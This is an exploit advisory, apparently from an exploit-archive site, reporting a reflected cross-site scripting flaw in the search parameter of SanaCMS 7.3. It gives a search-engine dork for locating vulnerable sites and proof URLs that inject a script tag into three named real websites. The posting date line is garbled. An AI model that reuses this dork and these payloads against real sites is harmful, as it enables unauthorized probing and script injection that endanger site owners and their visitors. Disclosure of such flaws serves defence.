SANADATA SanaCMS 7.3 Cross Site Scripting

Posted on 30 November -0001
<HTML><HEAD><TITLE>SANADATA | SanaCMS 7.3 Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>*=============================================================|
|A Exploit Title: SANADATA | SanaCMS 7.3 Cross Site Scripting
|
|A Exploit Author: Hosein Askari
|
|A Vendor HomePage: https://www.sanadata.com/|
|
|A Version : 7.3
|
|A Dork : intext:"SANADATA | SanaCMS 7.3"
|
|A Tested on:Parrot OS
|
|A Date: 3 /2 / 2017
|
|Gategory: WebApplication
*=============================================================|
|Vulnerability Path : http://127.0.0.1/fa/index.asp?p=search&search=
*===========================|
| Proof :
|
|http://www.corianco.com/fa/index.asp?p=search&search=<script>alert("xss")</script>
|http://www.esmhome.com/en/index.asp?p=search&search=<script>alert("xss")</script>
http://www.goldstarlogistics.org/fa/index.asp?p=search&search=<script>alert("xss")</script>
*===========================|
| Vulnerability description

|This CMS has a Cross Site Scripting Vulnerability

*=============================================================|
| Discovered By : C0NSTANTINE
*=============================================================|</BODY></HTML>
TOP
Malware :

Last 20
Exploits :

Last 20